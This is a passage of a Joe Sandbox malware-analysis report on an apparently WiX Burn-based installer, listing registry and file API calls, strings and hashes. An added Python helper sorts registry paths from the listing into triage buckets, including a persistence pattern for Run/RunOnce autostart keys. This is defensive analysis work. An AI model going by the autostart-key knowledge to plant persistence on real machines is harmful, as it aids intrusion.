  • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00916E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0097728C
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 0097722E
• Failed to open uninstall key for potential related bundle: %ls, xrefs: 0097721F
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseOpen
• String ID: Failed to open uninstall key for potential related bundle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
• API String ID: 47109696-3466351475
• Opcode ID: c4c1e09b0e53e10759582513a87f7ef5515defcc98a7c66ac59d6dfdfdd3d392
• Instruction ID: ecedc3f16f7119b32a8d7b4531959f667b4675d5599b9f76ae3373252060f1ab
• Opcode Fuzzy Hash: c4c1e09b0e53e10759582513a87f7ef5515defcc98a7c66ac59d6dfdfdd3d392
• Instruction Fuzzy Hash: 78217C76A00609BFDB01DFA8C845A9EBBF9EF88314F108465FA69E3251D7709E009B91
APIs
• RegCreateKeyExW.ADVAPI32(?,?,0096C4F6,00020006,?,?,00000000,00000000,00000000,00927B5F,00000000,00000000,?,00927B5F,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce), ref: 0096C55C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Create
• String ID: Failed to create registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 2289755597-627842214
• Opcode ID: e75c5e84fcfe74234eba36ab0fac951ce01f0511d8c5747635c5347f4c0f1347
• Instruction ID: 46d3b69e2500d95ade64de2fc8ba3301985b3c1bf4a954bf312fd60865a39fa6
• Opcode Fuzzy Hash: e75c5e84fcfe74234eba36ab0fac951ce01f0511d8c5747635c5347f4c0f1347
• Instruction Fuzzy Hash: B81108B6604219BBDB109F129D09EEF3EADDFC6750F050029BE06D7260EA31DD11D6B0
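The registry entries in this listing are what an analyst skims for first: the `SOFTWARE\Policies\` open and the `CurrentVersion\Uninstall` enumeration sit next to WiX dutil/butil error strings ("Failed to open uninstall key for potential related bundle"), and the `CurrentVersion\RunOnce` key is passed to RegCreateKeyExW with 0x20006 (KEY_WRITE) on the stack, consistent with the Burn engine's reboot-resume registration rather than with the stealer behaviour flagged in the signatures. Two caveats apply when reading these lines: Joe Sandbox prints the stack slots at the call site, so a key path printed next to RegCloseKey was in scope near the call, not necessarily that API's own argument; and the 80000002 / 00020019 / 00020006 values are the well-known HKEY_LOCAL_MACHINE, KEY_READ and KEY_WRITE constants. The following is an added example, not Joe Sandbox or WiX code: it parses the report's "APIs" line format, extracts registry paths and known constants from the printed slots, and buckets the paths for triage. The bucket names, the constant table and the `WRITE_APIS` set are this example's own assumptions; the sample lines are copied from the entries above.

```python
"""Triage helper for Joe Sandbox "APIs" listing lines.

Added example (not Joe Sandbox or WiX code).  It parses the per-function
API lines of the report, pulls registry paths out of the printed
argument/stack slots, decodes a few well-known constants and buckets the
paths by what they mean to an analyst.  Bucket names, the constant table
and WRITE_APIS are assumptions made for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One listing line: "• [Part of subcall function X: ]Api.Module(args), ref: ADDR"
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# A registry-path-looking slot, e.g. SOFTWARE\Policies\ (trailing backslash kept).
KEY_ARG = re.compile(r"[A-Za-z]\w*(?:\\[\w ]*)+")

# Well-known values that show up in the printed stack slots (assumed table).
KNOWN = {
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "00020019": "KEY_READ",
    "00020006": "KEY_WRITE",
}

# Assumed triage buckets; case-insensitive substring match on the path.
BUCKETS = {
    "persistence": ("\\currentversion\\run",),  # matches Run and RunOnce
    "install_state": ("\\currentversion\\uninstall",),
    "policy": ("software\\policies",),
}

WRITE_APIS = {"RegCreateKeyExW", "RegCreateKeyExA", "RegSetValueExW", "RegSetValueExA"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: List[str]
    caller: Optional[str] = None  # set when the report says "Part of subcall function"

    def registry_paths(self) -> List[str]:
        # The slots are a stack snapshot at the call site: a path here was in
        # scope near the call, it is not necessarily this API's own argument.
        return [a for a in self.args if KEY_ARG.fullmatch(a)]

    def known_constants(self) -> List[str]:
        return [KNOWN[a] for a in self.args if a in KNOWN]

    def is_write(self) -> bool:
        return self.api in WRITE_APIS


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], m["ref"], args, m["caller"]))
    return calls


def bucket_for(path: str) -> Optional[str]:
    low = path.lower()
    for name, needles in BUCKETS.items():
        if any(n in low for n in needles):
            return name
    return None


def triage(text: str) -> Dict[str, List[Tuple[str, str, str, bool]]]:
    """Map bucket -> [(api, ref, path, is_write)] for every registry path seen."""
    out: Dict[str, List[Tuple[str, str, str, bool]]] = {}
    for call in parse_api_lines(text):
        for path in call.registry_paths():
            name = bucket_for(path)
            if name:
                out.setdefault(name, []).append((call.api, call.ref, path, call.is_write()))
    return out


# Constructed input: four lines copied from this report's function listing.
SAMPLE_LINES = r"""
• CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,00916DEA,00000000,00917162,00000000,00000257,54B7FF10), ref: 00948132
  • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00916E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0097728C
• RegCreateKeyExW.ADVAPI32(?,?,0096C4F6,00020006,?,?,00000000,00000000,00000000,00927B5F,00000000,00000000,?,00927B5F,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce), ref: 0096C55C
"""

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_LINES).items():
        for api, ref, path, write in hits:
            print(f"{name:14} {'WRITE' if write else 'read '} {api}@{ref}: {path}")
```

Run over the four sample lines, `triage` returns one `persistence` hit (RegCreateKeyExW at 0096C55C on the RunOnce key, flagged as a write), one `install_state` hit for the Uninstall key and one `policy` hit for `SOFTWARE\Policies\`; the CompareStringW line carries no path and is dropped. The caller address is kept so a "Part of subcall function" hit can be attributed to the callee, not to the function whose entry it appears under.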
APIs
  • Part of subcall function 009739DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739F5
  • Part of subcall function 009739DD: GetLastError.KERNEL32(?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739FF
• WriteFile.KERNEL32(000000FF,00000008,00000008,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,0097850C), ref: 00978447
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00978425
• Failed to seek to start point in file., xrefs: 00978416
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: File$ErrorLastPointerWrite
• String ID: Failed to seek to start point in file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
• API String ID: 972348794-4104125422
• Opcode ID: ccc2b8c95737cf8b72588e356e32cdfe598c002bfc0da48c80943cbaa18ad773
• Instruction ID: a8612796c2794ea3361e8dff1f38f9b84b7fcdcbc5160e2e3fc318f603a9fc80
• Opcode Fuzzy Hash: ccc2b8c95737cf8b72588e356e32cdfe598c002bfc0da48c80943cbaa18ad773
• Instruction Fuzzy Hash: D401C87265021ABBD7148B58DC4AFAF776CEB00764F10822AB914D61D0D7F09E50C6A0
APIs
• RegQueryValueExW.ADVAPI32(?,0096D6D1,00000000,00916EDE,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,0092713E), ref: 0096C860
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: QueryValue
• String ID: Failed to read registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 3660427363-2776790363
• Opcode ID: 83c665efab47ecf2c78bfd12f9a2b206de7b1980f14009d20e613ed977afcd5a
• Instruction ID: 538b7522ffb94b65346c3fee4f5175bfc9b52793cabaa64acd91c4fd1a41d0c3
• Opcode Fuzzy Hash: 83c665efab47ecf2c78bfd12f9a2b206de7b1980f14009d20e613ed977afcd5a
• Instruction Fuzzy Hash: 3101D6B6B4011577D730191A5C49FBF6A9ECBC6B70F15402ABA49EB350E975CC0283F0
APIs
• RegSetValueExW.ADVAPI32(?,00928FA9,?,00000000,?,?,?,?), ref: 0096D738
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID: Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 3702945584-457337809
                                                                                                                                                                  • Opcode ID: eecbfa9071b7bf93507458f0d7dffa386738fd95c60042bfece5f3824e0aba4f
                                                                                                                                                                  • Instruction ID: 5e89f76e33d75acef88bfe7d3c20fb3d2365a342122ff3ab1560bb354371a701
                                                                                                                                                                  • Opcode Fuzzy Hash: eecbfa9071b7bf93507458f0d7dffa386738fd95c60042bfece5f3824e0aba4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 98F0F07B70126877E7212A1B5C08E9F3E6DDBC6B60F050029BF289B250EA318D02D2F1
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 0091997C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 009199AE
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 009199C0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                  • String ID: Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 1721193555-2731189036
                                                                                                                                                                  • Opcode ID: 8f7e76c2d1fc47c4640def6ec927303939e244b476d285bd37eb5b77a6cfee14
                                                                                                                                                                  • Instruction ID: b588c763e177a607eba3069268da217308617de990468677a37e51ec6e2b44ed
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7e76c2d1fc47c4640def6ec927303939e244b476d285bd37eb5b77a6cfee14
                                                                                                                                                                  • Instruction Fuzzy Hash: 61F0F972E0161C7ADF01EB98DC0AEDEBBB9AB44714F004825F614FA190E3B09944CB91
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00912B25: FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0093D303,00000000,00000008,00000000,80070656), ref: 00912B56
                                                                                                                                                                    • Part of subcall function 00912B25: GetLastError.KERNEL32(?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001,00000000,80070656,00000000,?), ref: 00912B63
                                                                                                                                                                    • Part of subcall function 00912B25: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001), ref: 00912BE7
                                                                                                                                                                  • MessageBoxW.USER32(00000000,00000000,?,00001010), ref: 0093D349
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate string to display error message, xrefs: 0093D30C
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp, xrefs: 0093D31B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ErrorFormatFreeLastLocal
                                                                                                                                                                  • String ID: Failed to allocate string to display error message$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp
                                                                                                                                                                  • API String ID: 2195691534-719764090
                                                                                                                                                                  • Opcode ID: 29c3640c0a9b9d05d0de98d232ce1c079b5fa8bbeea25deaacd864abc08c5d25
                                                                                                                                                                  • Instruction ID: 6a0c9f474338e7b667e096985431b3e4952c0baca7a7f652b65990c7faf6d2d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 29c3640c0a9b9d05d0de98d232ce1c079b5fa8bbeea25deaacd864abc08c5d25
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B01F932A81318F7DF259F84EC0BFDD7A79AB05749F148010FA0865090D2B49F98DF92
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,?,?,?,00911144,?,?,00000000), ref: 009179EF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,00911144,?,?,00000000), ref: 00917A1F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareStringlstrlen
                                                                                                                                                                  • String ID: burn.clean.room
                                                                                                                                                                  • API String ID: 1433953587-3055529264
                                                                                                                                                                  • Opcode ID: 00298512150fd794e7ebbf4806796c75915ddeb508c37661b4574d660cd7759c
                                                                                                                                                                  • Instruction ID: 56954296ecae9491eb3c4ce98d4fb9505ea8bb67a459115e8939493e051ee369
                                                                                                                                                                  • Opcode Fuzzy Hash: 00298512150fd794e7ebbf4806796c75915ddeb508c37661b4574d660cd7759c
                                                                                                                                                                  • Instruction Fuzzy Hash: 23F0F67271D2256AC7204BE5AC489BBFBBCDF9A750310441AF905D7220D2309DC0E7E0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009700B5: SysAllocString.OLEAUT32(00000000), ref: 009700C9
                                                                                                                                                                    • Part of subcall function 009700B5: VariantInit.OLEAUT32(?), ref: 009700D5
                                                                                                                                                                    • Part of subcall function 009700B5: VariantClear.OLEAUT32(?), ref: 009701C4
                                                                                                                                                                    • Part of subcall function 009700B5: SysFreeString.OLEAUT32(00000000), ref: 009701CF
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009703CD
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value from attribute., xrefs: 0097038F
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0097039E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                  • String ID: Failed to get value from attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                  • API String ID: 3379191133-973041108
                                                                                                                                                                  • Opcode ID: 55e13dd2c9a7cc18a062b045c65392a29905bf044194f28698985abf10996fb9
                                                                                                                                                                  • Instruction ID: f66ff3048043c400fc1f6757fa26c1a994706e3431573fa4c9e44daf7a70ab17
                                                                                                                                                                  • Opcode Fuzzy Hash: 55e13dd2c9a7cc18a062b045c65392a29905bf044194f28698985abf10996fb9
                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF0A972A41218FBEF12AB40CC07F9E7A69AB81755F008050F908AA1D0D6B28F20EB91
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write %ls value., xrefs: 00929188
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2586049171
                                                                                                                                                                  • Opcode ID: ac001b28a738abdd854c78593fd6ab35b7d7d79552cfa87380801d39d4d63f8f
                                                                                                                                                                  • Instruction ID: 0eaed6a9d7617496dc6eb6c71f03d2ca2ce5189d40e72493a291933e5a74cd21
                                                                                                                                                                  • Opcode Fuzzy Hash: ac001b28a738abdd854c78593fd6ab35b7d7d79552cfa87380801d39d4d63f8f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE02B34B04318A6DB20AA55EC0BFFEB6309BC5759F10001AB201701D1C9B486D4CB51
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write %ls value., xrefs: 009291BA
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2586049171
                                                                                                                                                                  • Opcode ID: 568614fda8d6d9e0cd4676930e0a8c3ba920e0c1994d8749f2f1e6e9895b0905
                                                                                                                                                                  • Instruction ID: 24b9cffc51ae3583737154c1baa2cb3e20b88a70a7ea01c3e98da518c621d0ac
                                                                                                                                                                  • Opcode Fuzzy Hash: 568614fda8d6d9e0cd4676930e0a8c3ba920e0c1994d8749f2f1e6e9895b0905
                                                                                                                                                                  • Instruction Fuzzy Hash: 99E02B34B04318A6DB20BA51EC0BFFEBA309BC5759F10001AB201701D1C9B446C4CB51
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write %ls value., xrefs: 00929159
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 009290F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-2586049171
                                                                                                                                                                  • Opcode ID: e4e3c2b3bb41fb6f4a67c4235d667d8a09074611e48394a38000e4d23695c059
                                                                                                                                                                  • Instruction ID: d0f5fc5cacc6716df4d73b4331bdd33300756e8425ca41a329707381c0e17a3c
                                                                                                                                                                  • Opcode Fuzzy Hash: e4e3c2b3bb41fb6f4a67c4235d667d8a09074611e48394a38000e4d23695c059
                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE02B30B04318A6DF20AA91EC0BFFEB6309BC5759F10015AB205701D1C9B446C4CA91
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to update name and publisher., xrefs: 009293EF
